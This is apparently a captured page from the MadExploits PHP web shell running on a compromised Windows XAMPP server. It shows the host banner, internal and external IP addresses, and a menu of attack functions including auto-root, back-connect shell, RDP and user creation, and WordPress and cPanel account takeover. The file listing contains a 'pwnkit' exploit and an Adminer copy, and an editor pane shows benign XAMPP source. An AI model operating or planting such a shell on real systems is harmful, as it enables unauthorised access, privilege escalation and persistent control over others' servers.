Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.28
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
src /
xampp-start-stop /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
Makefile
810
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
checkdll.c
516
B
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
rc.h
115
B
-rw-rw-rw-
xampp.ico
30.17
KB
-rw-rw-rw-
xampp.rc
1020
B
-rw-rw-rw-
xampp_start.c
796
B
-rw-rw-rw-
xampp_stop.c
1.42
KB
-rw-rw-rw-
xampp_util.c
1.55
KB
-rw-rw-rw-
xampp_util.h
140
B
-rw-rw-rw-
xamppcli.c
2.08
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xampp_util.c
// Copyright (C) 2007-2010 Kai Seidler, oswald@apachefriends.org, GPL-licensed #include <windows.h> #include <stdio.h> #include <process.h> #include <string.h> #include "xampp_util.h" void xampp_call(char *start[10][10]) { int s; int i; char buffer[200]; i=0; s=0; while(1) { if(start[i][0]==NULL) break; sprintf(buffer,"%s",start[i][0]); s=_spawnvp(P_NOWAIT,buffer, start[i]); if(s==-1) { printf("Error while calling %s...\n",buffer); } i++; } return; } void xampp_stop(char *pidfile,char *eventformat) { HANDLE shutdownEvent; char shutdownEventName[32]; FILE *fp; long pid; fp=fopen(pidfile,"r"); if(!fp) { printf("Can't find %s.\n", pidfile); } else { fscanf(fp,"%d", &pid); fclose(fp); sprintf_s(shutdownEventName, sizeof(shutdownEventName), eventformat, pid); shutdownEvent = OpenEvent(EVENT_MODIFY_STATE, FALSE, shutdownEventName); if (shutdownEvent != NULL) { SetEvent(shutdownEvent); } else { printf("Can't find process #%d.\n", pid); } } } void xampp_cdx() { char path[1000]; char *ptr; //path[ sizeof(path) -1] = 0; GetModuleFileName( NULL, path, sizeof( path ) -1 ); ptr=strrchr(path,'\\'); *ptr='\0'; chdir(path); //printf("chdir(%s)\n", path); }
Close